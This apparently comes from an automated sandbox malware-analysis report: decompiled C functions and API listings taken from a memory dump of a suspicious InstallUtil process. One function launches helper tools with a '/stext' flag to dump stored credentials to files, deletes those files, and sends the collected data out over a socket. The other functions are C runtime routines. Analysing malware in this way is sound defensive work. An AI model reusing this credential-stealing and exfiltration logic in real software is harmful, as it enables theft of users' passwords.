                                                                      								_t133 = E004449ED(_t165, _t184, _t203,  *((intOrPtr*)(_v44 + 0x160)), 0,  &_v24, _t179, _t184, _t147);
                                                                      							}
                                                                      							_t181 = _t184;
                                                                      							_t177 = _t133 - 1;
                                                                      							if(_t177 <= 0) {
                                                                      								L27:
                                                                      								E00432753(_t184);
                                                                      								goto L28;
                                                                      							} else {
                                                                      								_t148 = _v32;
                                                                      								_t185 = _v40;
                                                                      								while( *_t148 > 0) {
                                                                      									_t135 =  *_t181;
                                                                      									_t181 = _t181 + 2;
                                                                      									 *( *_t185) = _t135;
                                                                      									 *_t185 =  &(( *_t185)[0]);
                                                                      									 *_t148 =  *_t148 - 1;
                                                                      									_t177 = _t177 - 1;
                                                                      									if(_t177 > 0) {
                                                                      										continue;
                                                                      									}
                                                                      									break;
                                                                      								}
                                                                      								_t184 = _v28;
                                                                      								goto L27;
                                                                      							}
                                                                      						}
                                                                      						asm("sbb eax, eax");
                                                                      						_t137 = _t129 & _t175 + 0x00000008;
                                                                      						_t165 = _t175 + 8;
                                                                      						if((_t129 & _t175 + 0x00000008) > 0x400) {
                                                                      							__eflags = _t175 - _t165;
                                                                      							asm("sbb eax, eax");
                                                                      							_t186 = E004421F7(_t165, _t137 & _t165);
                                                                      							_v28 = _t186;
                                                                      							_pop(_t165);
                                                                      							__eflags = _t186;
                                                                      							if(__eflags == 0) {
                                                                      								goto L30;
                                                                      							}
                                                                      							 *_t186 = 0xdddd;
                                                                      							L14:
                                                                      							_t184 = _t186 + 8;
                                                                      							goto L18;
                                                                      						}
                                                                      						asm("sbb eax, eax");
                                                                      						E00452F00();
                                                                      						_t186 = _t188;
                                                                      						_v28 = _t186;
                                                                      						if(_t186 == 0) {
                                                                      							goto L30;
                                                                      						}
                                                                      						 *_t186 = 0xcccc;
                                                                      						goto L14;
                                                                      					}
                                                                      				}
                                                                      			}
                                                                      0x0044398a
                                                                      0x0044398d
                                                                      0x00443990
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00443992
                                                                      0x0044394f
                                                                      0x0044394f
                                                                      0x00443952
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00443954
                                                                      0x0044395c
                                                                      0x0044395f
                                                                      0x00443962
                                                                      0x00443962
                                                                      0x00000000
                                                                      0x0044394d
                                                                      0x0044390c
                                                                      0x0044390f
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00443916
                                                                      0x00443916
                                                                      0x00443919
                                                                      0x0044392c
                                                                      0x00000000
                                                                      0x0044392c
                                                                      0x0044391c
                                                                      0x0044391c
                                                                      0x0044391f
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00443925
                                                                      0x00000000
                                                                      0x00443925
                                                                      0x004437bd
                                                                      0x004438bb
                                                                      0x004438bb
                                                                      0x004438be
                                                                      0x004438e1
                                                                      0x004438e5
                                                                      0x004438e5
                                                                      0x00000000
                                                                      0x004438e5
                                                                      0x004438c0
                                                                      0x004438c0
                                                                      0x004438c3
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004438c5
                                                                      0x004438c5
                                                                      0x004438c8
                                                                      0x004438da
                                                                      0x00000000
                                                                      0x004438da
                                                                      0x004438ca
                                                                      0x004438ca
                                                                      0x004438cd
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004438d3
                                                                      0x00000000
                                                                      0x004438d3
                                                                      0x004437c3
                                                                      0x004437c6
                                                                      0x00443868
                                                                      0x00443868
                                                                      0x0044386d
                                                                      0x00443873
                                                                      0x00443873
                                                                      0x00443874
                                                                      0x00443877
                                                                      0x0044387d
                                                                      0x00443880
                                                                      0x00443883
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00443889
                                                                      0x0044388c
                                                                      0x0044388c
                                                                      0x0044388f
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00443897
                                                                      0x00443898
                                                                      0x0044389b
                                                                      0x0044389e
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004438a6
                                                                      0x004438a9
                                                                      0x004438ac
                                                                      0x004438ae
                                                                      0x004438b1
                                                                      0x004438b4
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004438b6
                                                                      0x0044388c
                                                                      0x00000000
                                                                      0x00443877
                                                                      0x004437cc
                                                                      0x004437cf
                                                                      0x004437e4
                                                                      0x004437ea
                                                                      0x004437f1
                                                                      0x004437f3
                                                                      0x0044384e
                                                                      0x00443854
                                                                      0x00443855
                                                                      0x00443857
                                                                      0x0044385c
                                                                      0x0044385c
                                                                      0x004437f5
                                                                      0x004437f5
                                                                      0x004437f8
                                                                      0x004437f8
                                                                      0x0044385f
                                                                      0x00000000
                                                                      0x0044385f
                                                                      0x004437d1
                                                                      0x004437d4
                                                                      0x0044382e
                                                                      0x0044382e
                                                                      0x00443831
                                                                      0x0044383d
                                                                      0x00443841
                                                                      0x00443841
                                                                      0x00000000
                                                                      0x00443841
                                                                      0x00443833
                                                                      0x00443833
                                                                      0x00443836
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00443838
                                                                      0x004437d6
                                                                      0x004437d9
                                                                      0x004437fd
                                                                      0x004437fd
                                                                      0x00443800
                                                                      0x00443823
                                                                      0x00443827
                                                                      0x00443827
                                                                      0x00000000
                                                                      0x00443827
                                                                      0x00443802
                                                                      0x00443802
                                                                      0x00443805
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00443807
                                                                      0x00443807
                                                                      0x0044380a
                                                                      0x0044381c
                                                                      0x00000000
                                                                      0x0044381c
                                                                      0x0044380c
                                                                      0x0044380c
                                                                      0x0044380f
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00443815
                                                                      0x00000000
                                                                      0x00443815
                                                                      0x004437db
                                                                      0x004437de
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004437de
                                                                      0x00000000
                                                                      0x00443a09
                                                                      0x00443701
                                                                      0x00443708
                                                                      0x00443731
                                                                      0x0044370a
                                                                      0x00443719
                                                                      0x00443719
                                                                      0x00443738
                                                                      0x0044373a
                                                                      0x0044373d
                                                                      0x00443762
                                                                      0x00443763
                                                                      0x00000000
                                                                      0x0044373f
                                                                      0x0044373f
                                                                      0x00443742
                                                                      0x00443745
                                                                      0x0044374c
                                                                      0x0044374f
                                                                      0x00443752
                                                                      0x00443755
                                                                      0x00443758
                                                                      0x0044375a
                                                                      0x0044375d
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0044375d
                                                                      0x0044375f
                                                                      0x00000000
                                                                      0x0044375f
                                                                      0x0044373d
                                                                      0x004436a5
                                                                      0x004436a7
                                                                      0x004436a9
                                                                      0x004436b1
                                                                      0x004436d6
                                                                      0x004436d8
                                                                      0x004436e2
                                                                      0x004436e4
                                                                      0x004436e7
                                                                      0x004436e8
                                                                      0x004436ea
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004436f0
                                                                      0x004436d1
                                                                      0x004436d1
                                                                      0x00000000
                                                                      0x004436d1
                                                                      0x004436b5
                                                                      0x004436b9
                                                                      0x004436be
                                                                      0x004436c0
                                                                      0x004436c5
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004436cb
                                                                      0x00000000
                                                                      0x004436cb
                                                                      0x0044368c

APIs
Strings
Memory Dump Source
• Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd
Yara matches
Similarity
• API ID: __freea$__alloca_probe_16_free
• String ID: (;D$a/p$am/pm
• API String ID: 2936374016-4206748460
• Opcode ID: 925600388eae5b9fe5ef28ee20559011114447a4b99b619c121301e124caed8f
• Instruction ID: d3242138bb380283d0fad9c9d15e7918e02d65915b858a35401e0b6ff28c876c
• Opcode Fuzzy Hash: 925600388eae5b9fe5ef28ee20559011114447a4b99b619c121301e124caed8f
• Instruction Fuzzy Hash: ACD112B1A00206DAFB289F68C4467BBB7B0FF04B12F28411BE5459B345D3BD9E41CB99
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 94%
                                                                      			E004104A5(void* __eflags, void* _a4, void* _a8, char _a28, void* _a32, char _a52, void* _a56, char _a72, void* _a80, char _a92) {
                                                                      				void* _v16;
                                                                      				short _v524;
                                                                      				char _v528;
                                                                      				char _v532;
                                                                      				char _v536;
                                                                      				char _v548;
                                                                      				void* _v552;
                                                                      				char _v576;
                                                                      				char _v600;
                                                                      				char _v624;
                                                                      				char _v644;
                                                                      				char _v652;
                                                                      				char _v668;
                                                                      				void* _v672;
                                                                      				char _v676;
                                                                      				char _v692;
                                                                      				void* _v696;
                                                                      				char _v700;
                                                                      				char _v716;
                                                                      				void* _v720;
                                                                      				void* _v736;
                                                                      				char _v740;
                                                                      				void* _v760;
                                                                      				char _v764;
                                                                      				void* _v784;
                                                                      				char _v788;
                                                                      				void* _v808;
                                                                      				char _v812;
                                                                      				char _v816;
                                                                      				void* _v832;
                                                                      				char _v836;
                                                                      				char _v844;
                                                                      				void* _v856;
                                                                      				char _v860;
                                                                      				char _v868;
                                                                      				void* _v872;
                                                                      				char _v884;
                                                                      				void* _v888;
                                                                      				char _v896;
                                                                      				char _v908;
                                                                      				void* _v912;
                                                                      				char _v920;
                                                                      				char _v932;
                                                                      				void* _v936;
                                                                      				char _v944;
                                                                      				char _v956;
                                                                      				char _v960;
                                                                      				void* _v964;
                                                                      				char _v980;
                                                                      				char _v984;
                                                                      				intOrPtr _v985;
                                                                      				char _v986;
                                                                      				char _v987;
                                                                      				char _v997;
                                                                      				void* __ebx;
                                                                      				void* __edi;
                                                                      				void* __ebp;
                                                                      				void* _t130;
                                                                      				void* _t142;
                                                                      				void* _t173;
                                                                      				void* _t199;
                                                                      				void* _t225;
                                                                      				void* _t226;
                                                                      				void* _t394;
                                                                      				void* _t399;
                                                                      				void* _t403;
                                                                      				void* _t406;
                                                                      
                                                                      				_t406 = __eflags;
                                                                      				_v984 = 0;
                                                                      				GetModuleFileNameW(0,  &_v524, 0x104);
                                                                      				_v987 = 0;
                                                                      				_v986 = 0;
                                                                      				E0040209F(0,  &_v716);
                                                                      				E0040209F(0,  &_v740);
                                                                      				E0040209F(0,  &_v764);
                                                                      				E00419012( &_v788, 0x30, E00401F6B(E00418114( &_v980)));
                                                                      				E00401F98();
                                                                      				E00419012( &_v812, 0x30, E00401F6B(E00418114( &_v980)));
                                                                      				E00401F98();
                                                                      				E00419012( &_v836, 0x30, E00401F6B(E00418114( &_v980)));
                                                                      				E00401F98();
                                                                      				_t130 = E00401F6B( &_a52);
                                                                      				_t402 = "\"";
                                                                      				_t393 = L" /stext \"";
                                                                      				_t224 = E004150C2(E00401EC4(E00402FD4(0,  &_v624, E004042DD(0,  &_v600, E004042BC(0,  &_v576,  &_v528, _t402, _t406, E0040413E(0,  &_v548, 0x30, "\"", L" /stext \"")), _t402, _t406,  &_v788), L" /stext \"", _t402, _t406, _t402)));
                                                                      				E00401EC9();
                                                                      				E00401EC9();
                                                                      				E00401EC9();
                                                                      				E00401EC9();
                                                                      				_t142 = E00401F6B( &_a72);
                                                                      				_t225 = E004150C2(E00401EC4(E00402FD4(_t224,  &_v700, E004042DD(_t137,  &_v676, E004042BC(_t137,  &_v652,  &_v532, _t402, _t406, E0040413E(_t137,  &_v960, _t130, _t402, _t393)), _t402, _t406,  &_v816), _t393, _t402, _t406, _t402)));
                                                                      				E00401EC9();
                                                                      				E00401EC9();
                                                                      				E00401EC9();
                                                                      				E00401EC9();
                                                                      				E00401F6B( &_a92);
                                                                      				_v997 = E004150C2(E00401EC4(E00402FD4(_t225,  &_v944, E004042DD(_t225,  &_v920, E004042BC(_t225,  &_v896,  &_v536, _t402, _t406, E0040413E(_t225,  &_v868, _t142, _t402, _t393)), _t402, _t406,  &_v844), _t393, _t402, _t406, _t402)));
                                                                      				E00401EC9();
                                                                      				E00401EC9();
                                                                      				E00401EC9();
                                                                      				E00401EC9();
                                                                      				_t399 =  ==  ? 1 : 0;
                                                                      				if(_t225 == 0) {
                                                                      					_t399 = _t399 + 1;
                                                                      				}
                                                                      				if(_v985 == 0) {
                                                                      					_t399 = _t399 + 1;
                                                                      				}
                                                                      				_t226 = DeleteFileW;
                                                                      				_t394 = 0;
                                                                      				while(1) {
                                                                      					E00401EC4( &_v788);
                                                                      					if(E004189A5( &_v716) != 0) {
                                                                      						_v984 = 1;
                                                                      						DeleteFileW(E00401EC4( &_v788));
                                                                      					}
                                                                      					E00401EC4( &_v812);
                                                                      					if(E004189A5( &_v740) != 0) {
                                                                      						_v987 = 1;
                                                                      						DeleteFileW(E00401EC4( &_v812));
                                                                      					}
                                                                      					E00401EC4( &_v836);
                                                                      					if(E004189A5( &_v764) != 0) {
                                                                      						_v986 = 1;
                                                                      						DeleteFileW(E00401EC4( &_v836));
                                                                      					}
                                                                      					if(_v984 != 0 && _v987 != 0 && _v986 != 0) {
                                                                      						break;
                                                                      					}
                                                                      					Sleep(0x1f4);
                                                                      					_t394 = _t394 + 1;
                                                                      					if(_t394 < 0xa) {
                                                                      						continue;
                                                                      					}
                                                                      					break;
                                                                      				}
                                                                      				_t173 = E00405ADC("0");
                                                                      				_t419 = _t173;
                                                                      				if(_t173 == 0) {
                                                                      					E00402ED0(_t226, _t403 - 0x18, E00402ED0(_t226,  &_v860, E00402ED0(_t226,  &_v884, E00402ED0(_t226,  &_v908, E00402ED0(_t226,  &_v932, E00402EF1( &_v956,  &_a28, _t402, 0x46e260), _t402, __eflags,  &_v716), _t402, __eflags, 0x46e260), _t402, __eflags,  &_v740), _t402, __eflags, 0x46e260), _t402, __eflags,  &_v764);
                                                                      					_push(0x6a);
                                                                      					E00404A78(0x46e6f0, _t180, __eflags);
                                                                      					E00401F98();
                                                                      					E00401F98();
                                                                      					E00401F98();
                                                                      					E00401F98();
                                                                      				} else {
                                                                      					_t199 = E004182D1(_t226,  &_v692, _t399);
                                                                      					E00402E61(_t403 - 0x18, E00402ED0(_t226,  &_v860, E00402ED0(_t226,  &_v884, E00402ED0(_t226,  &_v908, E00402ED0(_t226,  &_v932, E00402ED0(_t226,  &_v956, E00402ED0(_t226,  &_v644, E00402EF1( &_v668,  &_a28, _t402, 0x46e260), _t402, _t419,  &_v716), _t402, _t419, 0x46e260), _t402, _t419,  &_v740), _t402, _t419, 0x46e260), _t402, _t419,  &_v764), _t402, _t419, 0x46e260), _t199);
                                                                      					_push(0x69);
                                                                      					E00404A78(0x46e6f0, _t207, _t419);
                                                                      					E00401F98();
                                                                      					E00401F98();
                                                                      					E00401F98();
                                                                      					E00401F98();
                                                                      					E00401F98();
                                                                      					E00401F98();
                                                                      					E00401F98();
                                                                      				}
                                                                      				E00401F98();
                                                                      				E00401EC9();
                                                                      				E00401EC9();
                                                                      				E00401EC9();
                                                                      				E00401F98();
                                                                      				E00401F98();
                                                                      				E00401F98();
                                                                      				E00401F98();
                                                                      				E00401F98();
                                                                      				E00401F98();
                                                                      				E00401F98();
                                                                      				return E00401F98();
                                                                      			}

                                                                      APIs
                                                                      • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 004104C3
                                                                        • Part of subcall function 00418114: GetCurrentProcessId.KERNEL32(00000000,76F1FBB0,00000000,?,?,?,?,004610EC,0040B043,.vbs,?,?,?,?,?,0046E5A0), ref: 0041813B
                                                                        • Part of subcall function 004150C2: CloseHandle.KERNEL32(004040B5,?,004040B5,00460E24), ref: 004150D8
                                                                        • Part of subcall function 004150C2: CloseHandle.KERNEL32(00460E24,?,004040B5,00460E24), ref: 004150E1
                                                                      • DeleteFileW.KERNEL32(00000000,00460E24,00460E24), ref: 00410782
                                                                      • DeleteFileW.KERNEL32(00000000,00460E24,00460E24,00460E24), ref: 004107B4
                                                                      • DeleteFileW.KERNEL32(00000000,00460E24,00460E24,00460E24), ref: 004107E6
                                                                      • Sleep.KERNEL32(000001F4,00460E24,00460E24), ref: 00410802
                                                                        • Part of subcall function 00404A78: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B0D
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: File$Delete$CloseHandle$CurrentModuleNameProcessSleepsend
                                                                      • String ID: /stext "
                                                                      • API String ID: 1351907930-3856184850
                                                                      • Opcode ID: 0491deb063fce47d69cdaf35a6836c3182c23433c2ff0308d8676163c6bc412c
                                                                      • Instruction ID: 360a572785ef5307357cc913acf5e4219c6e157c246405b70e1dfce6b01e80ff
                                                                      • Opcode Fuzzy Hash: 0491deb063fce47d69cdaf35a6836c3182c23433c2ff0308d8676163c6bc412c
                                                                      • Instruction Fuzzy Hash: F9D158311183814BC329F735D851AEFB3D5AF95308F40493FB48A531E2EF78598AC69A
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 95%
                                                                      			E0044C796(void* __edx, char _a4) {
                                                                      				void* _v8;
                                                                      				void* _v12;
                                                                      				signed int _v16;
                                                                      				signed int _v20;
                                                                      				signed int _v24;
                                                                      				char _v28;
                                                                      				void* __ebx;
                                                                      				void* __edi;
                                                                      				void* __esi;
                                                                      				void* _t53;
                                                                      				void _t57;
                                                                      				intOrPtr _t58;
                                                                      				intOrPtr _t59;
                                                                      				intOrPtr _t60;
                                                                      				intOrPtr _t61;
                                                                      				signed int _t64;
                                                                      				char _t92;
                                                                      				char _t100;
                                                                      				void* _t101;
                                                                      				signed int _t104;
                                                                      				void* _t107;
                                                                      				void* _t121;
                                                                      				char* _t123;
                                                                      				signed int _t127;
                                                                      				intOrPtr* _t132;
                                                                      				void* _t133;
                                                                      				intOrPtr* _t134;
                                                                      				signed int _t135;
                                                                      				signed int _t136;
                                                                      				signed int _t137;
                                                                      				signed int _t138;
                                                                      				char* _t139;
                                                                      
                                                                      				_t121 = __edx;
                                                                      				_t100 = _a4;
                                                                      				_v28 = _t100;
                                                                      				_v24 = 0;
                                                                      				if( *((intOrPtr*)(_t100 + 0xb0)) != 0 ||  *((intOrPtr*)(_t100 + 0xac)) != 0) {
                                                                      					_v16 = 1;
                                                                      					_t53 = E00441BB3(_t101, 1, 0x50);
                                                                      					_v8 = _t53;
                                                                      					if(_t53 != 0) {
                                                                      						_t104 = 0x14;
                                                                      						memcpy(_t53,  *(_t100 + 0x88), _t104 << 2);
                                                                      						_t132 = E004421F7(0, 4);
                                                                      						_t127 = 0;
                                                                      						_v12 = _t132;
                                                                      						E004427C2(0);
                                                                      						_pop(_t107);
                                                                      						if(_t132 != 0) {
                                                                      							 *_t132 = 0;
                                                                      							if( *((intOrPtr*)(_t100 + 0xb0)) == 0) {
                                                                      								_t133 = _v8;
                                                                      								_t57 =  *0x46c178; // 0x46c170
                                                                      								 *_t133 = _t57;
                                                                      								_t58 =  *0x46c17c; // 0x46d64c
                                                                      								 *((intOrPtr*)(_t133 + 4)) = _t58;
                                                                      								_t59 =  *0x46c180; // 0x46d64c
                                                                      								 *((intOrPtr*)(_t133 + 8)) = _t59;
                                                                      								_t60 =  *0x46c1a8; // 0x46c174
                                                                      								 *((intOrPtr*)(_t133 + 0x30)) = _t60;
                                                                      								_t61 =  *0x46c1ac; // 0x46d650
                                                                      								 *((intOrPtr*)(_t133 + 0x34)) = _t61;
                                                                      								L19:
                                                                      								 *_v12 = 1;
                                                                      								if(_t127 != 0) {
                                                                      									 *_t127 = 1;
                                                                      								}
                                                                      								goto L21;
                                                                      							}
                                                                      							_t134 = E004421F7(_t107, 4);
                                                                      							_v20 = _t134;
                                                                      							E004427C2(0);
                                                                      							if(_t134 == 0) {
                                                                      								L11:
                                                                      								E004427C2(_v8);
                                                                      								E004427C2(_v12);
                                                                      								return _v16;
                                                                      							}
                                                                      							 *_t134 = 0;
                                                                      							_t128 =  *((intOrPtr*)(_t100 + 0xb0));
                                                                      							_t135 = E0044EBE5(_t100, _t121,  *((intOrPtr*)(_t100 + 0xb0)), _t134,  &_v28, 1,  *((intOrPtr*)(_t100 + 0xb0)), 0xe, _v8);
                                                                      							_t136 = _t135 | E0044EBE5(_t100, _t121,  *((intOrPtr*)(_t100 + 0xb0)), _t135,  &_v28, 1, _t128, 0xf, _v8 + 4);
                                                                      							_v16 = _v8 + 8;
                                                                      							_t137 = _t136 | E0044EBE5(_t100, _t121, _t128, _t136,  &_v28, 1, _t128, 0x10, _v8 + 8);
                                                                      							_t138 = _t137 | E0044EBE5(_t100, _t121, _t128, _t137,  &_v28, 2, _t128, 0xe, _v8 + 0x30);
                                                                      							if((E0044EBE5(_t100, _t121, _t128, _t138,  &_v28, 2, _t128, 0xf, _v8 + 0x34) | _t138) == 0) {
                                                                      								_t123 =  *_v16;
                                                                      								while( *_t123 != 0) {
                                                                      									_t92 =  *_t123;
                                                                      									if(_t92 < 0x30 || _t92 > 0x39) {
                                                                      										if(_t92 != 0x3b) {
                                                                      											goto L16;
                                                                      										}
                                                                      										_t139 = _t123;
                                                                      										do {
                                                                      											 *_t139 =  *((intOrPtr*)(_t139 + 1));
                                                                      											_t139 = _t139 + 1;
                                                                      										} while ( *_t139 != 0);
                                                                      									} else {
                                                                      										 *_t123 = _t92 - 0x30;
                                                                      										L16:
                                                                      										_t123 = _t123 + 1;
                                                                      									}
                                                                      								}
                                                                      								_t127 = _v20;
                                                                      								_t133 = _v8;
                                                                      								goto L19;
                                                                      							}
                                                                      							E0044C72D(_v8);
                                                                      							_v16 = _v16 | 0xffffffff;
                                                                      							goto L11;
                                                                      						}
                                                                      						E004427C2(_v8);
                                                                      						return 1;
                                                                      					}
                                                                      					return 1;
                                                                      				} else {
                                                                      					_t127 = 0;
                                                                      					_v12 = 0;
                                                                      					_t133 = 0x46c178;
                                                                      					L21:
                                                                      					_t64 =  *(_t100 + 0x80);
                                                                      					if(_t64 != 0) {
                                                                      						asm("lock dec dword [eax]");
                                                                      					}
                                                                      					if( *((intOrPtr*)(_t100 + 0x7c)) != 0) {
                                                                      						asm("lock xadd [ecx], eax");
                                                                      						if((_t64 | 0xffffffff) == 0) {
                                                                      							E004427C2( *((intOrPtr*)(_t100 + 0x7c)));
                                                                      							E004427C2( *(_t100 + 0x88));
                                                                      						}
                                                                      					}
                                                                      					 *((intOrPtr*)(_t100 + 0x7c)) = _v12;
                                                                      					 *(_t100 + 0x80) = _t127;
                                                                      					 *(_t100 + 0x88) = _t133;
                                                                      					return 0;
                                                                      				}
                                                                      			}

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: _free
                                                                      • String ID:
                                                                      • API String ID: 269201875-0
                                                                      • Opcode ID: 431cc729f4285e9de773e2587d7be0d99c6a6d89c567df6338a0676290dc4830
                                                                      • Instruction ID: 2201e75b111225be368d50658d4eda75df7e0c7c63c2950a9ed7280f3aa06522
                                                                      • Opcode Fuzzy Hash: 431cc729f4285e9de773e2587d7be0d99c6a6d89c567df6338a0676290dc4830
                                                                      • Instruction Fuzzy Hash: 0F61D275E01205AFFB60DF69C881BAABBF4FF05710F18416BE944EB281E7749D418B58
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 73%
                                                                      			E00446268(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, signed int _a8, signed char* _a12, intOrPtr _a16) {
                                                                      				signed int _v8;
                                                                      				signed char _v15;
                                                                      				char _v16;
                                                                      				void _v24;
                                                                      				short _v28;
                                                                      				char _v31;
                                                                      				void _v32;
                                                                      				long _v36;
                                                                      				intOrPtr _v40;
                                                                      				void* _v44;
                                                                      				signed int _v48;
                                                                      				signed char* _v52;
                                                                      				long _v56;
                                                                      				int _v60;
                                                                      				signed int _t78;
                                                                      				signed int _t80;
                                                                      				int _t86;
                                                                      				void* _t94;
                                                                      				long _t97;
                                                                      				void _t105;
                                                                      				void* _t112;
                                                                      				signed int _t116;
                                                                      				signed int _t118;
                                                                      				signed char _t123;
                                                                      				signed char _t128;
                                                                      				intOrPtr _t129;
                                                                      				signed int _t131;
                                                                      				signed char* _t133;
                                                                      				intOrPtr* _t135;
                                                                      				signed int _t136;
                                                                      				void* _t137;
                                                                      
                                                                      				_t78 =  *0x46c00c; // 0xe1ce05e9
                                                                      				_v8 = _t78 ^ _t136;
                                                                      				_t80 = _a8;
                                                                      				_t118 = _t80 >> 6;
                                                                      				_t116 = (_t80 & 0x0000003f) * 0x30;
                                                                      				_t133 = _a12;
                                                                      				_v52 = _t133;
                                                                      				_v48 = _t118;
                                                                      				_v44 =  *((intOrPtr*)( *((intOrPtr*)(0x46d800 + _t118 * 4)) + _t116 + 0x18));
                                                                      				_v40 = _a16 + _t133;
                                                                      				_t86 = GetConsoleCP();
                                                                      				_t135 = _a4;
                                                                      				_v60 = _t86;
                                                                      				 *_t135 = 0;
                                                                      				 *((intOrPtr*)(_t135 + 4)) = 0;
                                                                      				 *((intOrPtr*)(_t135 + 8)) = 0;
                                                                      				while(_t133 < _v40) {
                                                                      					_v28 = 0;
                                                                      					_v31 =  *_t133;
                                                                      					_t129 =  *((intOrPtr*)(0x46d800 + _v48 * 4));
                                                                      					_t123 =  *(_t129 + _t116 + 0x2d);
                                                                      					if((_t123 & 0x00000004) == 0) {
                                                                      						if(( *(E00441C10(_t116, _t129) + ( *_t133 & 0x000000ff) * 2) & 0x00008000) == 0) {
                                                                      							_push(1);
                                                                      							_push(_t133);
                                                                      							goto L8;
                                                                      						} else {
                                                                      							if(_t133 >= _v40) {
                                                                      								_t131 = _v48;
                                                                      								 *((char*)( *((intOrPtr*)(0x46d800 + _t131 * 4)) + _t116 + 0x2e)) =  *_t133;
                                                                      								 *( *((intOrPtr*)(0x46d800 + _t131 * 4)) + _t116 + 0x2d) =  *( *((intOrPtr*)(0x46d800 + _t131 * 4)) + _t116 + 0x2d) | 0x00000004;
                                                                      								 *((intOrPtr*)(_t135 + 4)) =  *((intOrPtr*)(_t135 + 4)) + 1;
                                                                      							} else {
                                                                      								_t112 = E00447542( &_v28, _t133, 2);
                                                                      								_t137 = _t137 + 0xc;
                                                                      								if(_t112 != 0xffffffff) {
                                                                      									_t133 =  &(_t133[1]);
                                                                      									goto L9;
                                                                      								}
                                                                      							}
                                                                      						}
                                                                      					} else {
                                                                      						_t128 = _t123 & 0x000000fb;
                                                                      						_v16 =  *((intOrPtr*)(_t129 + _t116 + 0x2e));
                                                                      						_push(2);
                                                                      						_v15 = _t128;
                                                                      						 *(_t129 + _t116 + 0x2d) = _t128;
                                                                      						_push( &_v16);
                                                                      						L8:
                                                                      						_push( &_v28);
                                                                      						_t94 = E00447542();
                                                                      						_t137 = _t137 + 0xc;
                                                                      						if(_t94 != 0xffffffff) {
                                                                      							L9:
                                                                      							_t133 =  &(_t133[1]);
                                                                      							_t97 = WideCharToMultiByte(_v60, 0,  &_v28, 1,  &_v24, 5, 0, 0);
                                                                      							_v56 = _t97;
                                                                      							if(_t97 != 0) {
                                                                      								if(WriteFile(_v44,  &_v24, _t97,  &_v36, 0) == 0) {
                                                                      									L19:
                                                                      									 *_t135 = GetLastError();
                                                                      								} else {
                                                                      									 *((intOrPtr*)(_t135 + 4)) =  *((intOrPtr*)(_t135 + 8)) - _v52 + _t133;
                                                                      									if(_v36 >= _v56) {
                                                                      										if(_v31 != 0xa) {
                                                                      											goto L16;
                                                                      										} else {
                                                                      											_t105 = 0xd;
                                                                      											_v32 = _t105;
                                                                      											if(WriteFile(_v44,  &_v32, 1,  &_v36, 0) == 0) {
                                                                      												goto L19;
                                                                      											} else {
                                                                      												if(_v36 >= 1) {
                                                                      													 *((intOrPtr*)(_t135 + 8)) =  *((intOrPtr*)(_t135 + 8)) + 1;
                                                                      													 *((intOrPtr*)(_t135 + 4)) =  *((intOrPtr*)(_t135 + 4)) + 1;
                                                                      													goto L16;
                                                                      												}
                                                                      											}
                                                                      										}
                                                                      									}
                                                                      								}
                                                                      							}
                                                                      						}
                                                                      					}
                                                                      					goto L20;
                                                                      					L16:
                                                                      				}
                                                                      				L20:
                                                                      				return E004318FB(_v8 ^ _t136);
                                                                      			}

                                                                      APIs
                                                                      • GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,004469DD,E*E,00000000,00000000,00000000,00000000,00000000), ref: 004462AA
                                                                      • __fassign.LIBCMT ref: 00446325
                                                                      • __fassign.LIBCMT ref: 00446340
                                                                      • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 00446366
                                                                      • WriteFile.KERNEL32(?,00000000,00000000,004469DD,00000000,?,?,?,?,?,?,?,?,?,004469DD,E*E), ref: 00446385
                                                                      • WriteFile.KERNEL32(?,?,00000001,004469DD,00000000,?,?,?,?,?,?,?,?,?,004469DD,E*E), ref: 004463BE
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd
                                                                      Similarity
                                                                      • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                      • String ID:
                                                                      • API String ID: 1324828854-0
